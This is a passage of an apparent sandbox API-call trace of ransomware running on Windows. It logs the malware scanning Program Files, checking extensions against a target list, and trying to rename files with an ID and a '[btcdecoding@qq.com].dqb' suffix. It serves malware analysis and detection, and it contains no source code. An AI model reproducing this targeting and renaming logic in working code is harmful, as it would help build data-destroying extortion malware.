returned 4 [0269.433] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.433] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0269.433] lstrlenW (lpString="FlickAnimation.avi") returned 18 [0269.433] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0269.433] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2c0ff1c | out: lpFileSize=0x2c0ff1c*=1600388) returned 1 [0269.433] CloseHandle (hObject=0x1f4) returned 1 [0269.433] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi")) returned 0x20 [0269.433] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.433] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0269.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0269.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0269.434] lstrlenW (lpString=".doc") returned 4 [0269.434] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.434] lstrlenW (lpString=".docx") returned 5 [0269.434] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0269.434] lstrlenW (lpString=".pdf") returned 4 [0269.434] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.434] lstrlenW (lpString=".xls") returned 4 [0269.434] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.434] lstrlenW (lpString=".xlsx") returned 5 [0269.434] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0269.434] lstrlenW (lpString=".ppt") returned 4 [0269.434] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0269.434] lstrlenW (lpString=".zip") returned 4 [0269.434] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.434] lstrlenW (lpString=".rar") returned 4 [0269.434] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.434] lstrlenW (lpString=".bz2") returned 4 [0269.434] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.434] lstrlenW (lpString=".7z") returned 3 [0269.434] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0269.434] lstrlenW (lpString=".dbf") returned 4 [0269.434] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0269.434] lstrlenW (lpString=".1cd") returned 4 [0269.434] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0269.434] lstrlenW (lpString=".jpg") returned 4 [0269.434] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0269.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0269.434] lstrlenW (lpString=".doc") returned 4 [0269.434] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.435] lstrlenW (lpString=".docx") returned 5 [0269.435] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0269.435] lstrlenW (lpString=".pdf") returned 4 [0269.435] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.435] lstrlenW (lpString=".xls") returned 4 [0269.435] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.435] lstrlenW (lpString=".xlsx") returned 5 [0269.435] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0269.435] lstrlenW (lpString=".ppt") returned 4 [0269.435] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0269.435] lstrlenW (lpString=".zip") returned 4 [0269.435] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.435] lstrlenW (lpString=".rar") returned 4 [0269.435] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.435] lstrlenW (lpString=".bz2") returned 4 [0269.435] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.435] lstrlenW (lpString=".7z") returned 3 [0269.435] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0269.435] lstrlenW (lpString=".dbf") returned 4 [0269.435] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0269.435] lstrlenW (lpString=".1cd") returned 4 [0269.435] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0269.435] lstrlenW (lpString=".jpg") returned 4 [0269.435] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.435] Sleep (dwMilliseconds=0x64) [0269.543] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0269.543] lstrlenW (lpString="auxbase.xml") returned 11 [0269.543] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.544] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x2c0ff1c | out: lpFileSize=0x2c0ff1c*=1434) returned 1 [0269.544] CloseHandle (hObject=0x1f0) returned 1 [0269.544] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0x20 [0269.544] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.545] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.545] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0269.545] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0269.545] lstrlenW (lpString=".doc") returned 4 [0269.545] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0269.545] lstrlenW (lpString=".docx") returned 5 [0269.545] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0269.545] lstrlenW (lpString=".pdf") returned 4 [0269.545] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0269.545] lstrlenW (lpString=".xls") returned 4 [0269.545] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0269.545] lstrlenW (lpString=".xlsx") returned 5 [0269.545] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0269.545] lstrlenW (lpString=".ppt") returned 4 [0269.545] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0269.545] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0269.545] lstrlenW (lpString=".zip") returned 4 [0269.545] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0269.545] lstrlenW (lpString=".rar") returned 4 [0269.545] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0269.545] lstrlenW (lpString=".bz2") returned 4 [0269.545] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0269.545] lstrlenW (lpString=".7z") returned 3 [0269.545] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0269.545] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0269.545] lstrlenW (lpString=".dbf") returned 4 [0269.545] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0269.545] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0269.545] lstrlenW (lpString=".1cd") returned 4 [0269.545] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0269.545] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0269.545] lstrlenW (lpString=".jpg") returned 4 [0269.545] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0269.546] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0269.546] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0269.546] lstrlenW (lpString=".doc") returned 4 [0269.546] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0269.546] lstrlenW (lpString=".docx") returned 5 [0269.546] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0269.546] lstrlenW (lpString=".pdf") returned 4 [0269.546] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0269.546] lstrlenW (lpString=".xls") returned 4 [0269.546] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0269.546] lstrlenW (lpString=".xlsx") returned 5 [0269.546] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0269.546] lstrlenW (lpString=".ppt") returned 4 [0269.546] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0269.546] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0269.546] lstrlenW (lpString=".zip") returned 4 [0269.546] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0269.546] lstrlenW (lpString=".rar") returned 4 [0269.546] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0269.546] lstrlenW (lpString=".bz2") returned 4 [0269.546] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0269.546] lstrlenW (lpString=".7z") returned 3 [0269.546] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0269.546] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0269.546] lstrlenW (lpString=".dbf") returned 4 [0269.546] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0269.546] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0269.546] lstrlenW (lpString=".1cd") returned 4 [0269.546] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0269.546] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0269.546] lstrlenW (lpString=".jpg") returned 4 [0269.546] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0269.547] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0269.547] lstrlenW (lpString="auxpad.xml") returned 10 [0269.547] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.547] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x2c0ff1c | out: lpFileSize=0x2c0ff1c*=212) returned 1 [0269.547] CloseHandle (hObject=0x1f0) returned 1 [0269.547] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml")) returned 0x20 [0269.547] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.547] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.547] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0269.547] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0269.547] lstrlenW (lpString=".doc") returned 4 [0269.547] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0269.547] lstrlenW (lpString=".docx") returned 5 [0269.547] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0269.547] lstrlenW (lpString=".pdf") returned 4 [0269.547] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0269.547] lstrlenW (lpString=".xls") returned 4 [0269.547] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0269.547] lstrlenW (lpString=".xlsx") returned 5 [0269.547] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0269.547] lstrlenW (lpString=".ppt") returned 4 [0269.548] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0269.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0269.548] lstrlenW (lpString=".zip") returned 4 [0269.548] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0269.548] lstrlenW (lpString=".rar") returned 4 [0269.548] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0269.548] lstrlenW (lpString=".bz2") returned 4 [0269.548] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0269.548] lstrlenW (lpString=".7z") returned 3 [0269.548] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0269.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0269.548] lstrlenW (lpString=".dbf") returned 4 [0269.548] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0272.022] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0272.022] lstrcmpiW (lpString1=".docx", lpString2="l.bmp") returned -1 [0272.022] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0272.023] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0272.023] lstrcmpiW (lpString1=".xlsx", lpString2="l.bmp") returned -1 [0272.023] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0272.023] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0272.023] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0272.023] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0272.023] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0272.023] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0272.023] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0272.023] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0272.023] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0272.023] lstrcmpiW (lpString1=".docx", lpString2="l.bmp") returned -1 [0272.023] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0272.023] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0272.023] lstrcmpiW (lpString1=".xlsx", lpString2="l.bmp") returned -1 [0272.023] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0272.023] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0272.023] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0272.023] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0272.023] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0272.023] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0272.024] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0272.024] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0272.024] lstrcmpiW (lpString1=".png", lpString2=".dqb") returned 1 [0272.024] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\navigationbuttonsubpicture.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.025] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2c0ff1c | out: lpFileSize=0x2c0ff1c*=2978) returned 1 [0272.025] CloseHandle (hObject=0x31c) returned 1 [0272.025] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\navigationbuttonsubpicture.png")) returned 0x20 [0272.082] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\navigationbuttonsubpicture.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.082] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\navigationbuttonsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.082] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0272.082] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0272.082] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0272.082] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0272.082] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0272.082] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0272.082] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0272.082] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0272.082] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0272.082] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0272.082] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0272.082] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0272.082] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0272.083] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0272.083] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0272.083] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0272.083] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0272.083] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0272.083] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0272.083] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0272.083] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0272.083] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0272.083] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0272.083] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0272.083] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0272.083] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0272.083] lstrcmpiW (lpString1=".png", lpString2=".dqb") returned 1 [0272.083] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha1.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.084] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2c0ff1c | out: lpFileSize=0x2c0ff1c*=3133) returned 1 [0272.084] CloseHandle (hObject=0x31c) returned 1 [0272.084] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha1.png")) returned 0x20 [0272.084] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha1.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.084] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.084] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0272.084] lstrcmpiW (lpString1=".docx", lpString2="1.png") returned -1 [0272.084] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0272.084] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0272.084] lstrcmpiW (lpString1=".xlsx", lpString2="1.png") returned -1 [0272.084] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0272.084] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0272.084] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0272.084] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0272.084] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0272.084] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0272.084] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0272.084] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0272.085] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0272.085] lstrcmpiW (lpString1=".docx", lpString2="1.png") returned -1 [0272.085] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0272.085] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0272.085] lstrcmpiW (lpString1=".xlsx", lpString2="1.png") returned -1 [0272.085] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0272.085] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0272.085] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0272.085] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0272.085] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0272.085] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0272.085] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0272.085] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0272.085] lstrcmpiW (lpString1=".png", lpString2=".dqb") returned 1 [0272.085] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha2.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.085] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2c0ff1c | out: lpFileSize=0x2c0ff1c*=3518) returned 1 [0272.086] CloseHandle (hObject=0x31c) returned 1 [0272.086] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha2.png")) returned 0x20 [0272.086] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha2.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.086] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.086] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0272.086] lstrcmpiW (lpString1=".docx", lpString2="2.png") returned -1 [0272.086] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0272.086] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0272.086] lstrcmpiW (lpString1=".xlsx", lpString2="2.png") returned -1 [0272.086] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0272.086] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0272.086] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0272.086] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0272.086] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0272.086] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0272.086] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0272.086] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0272.086] 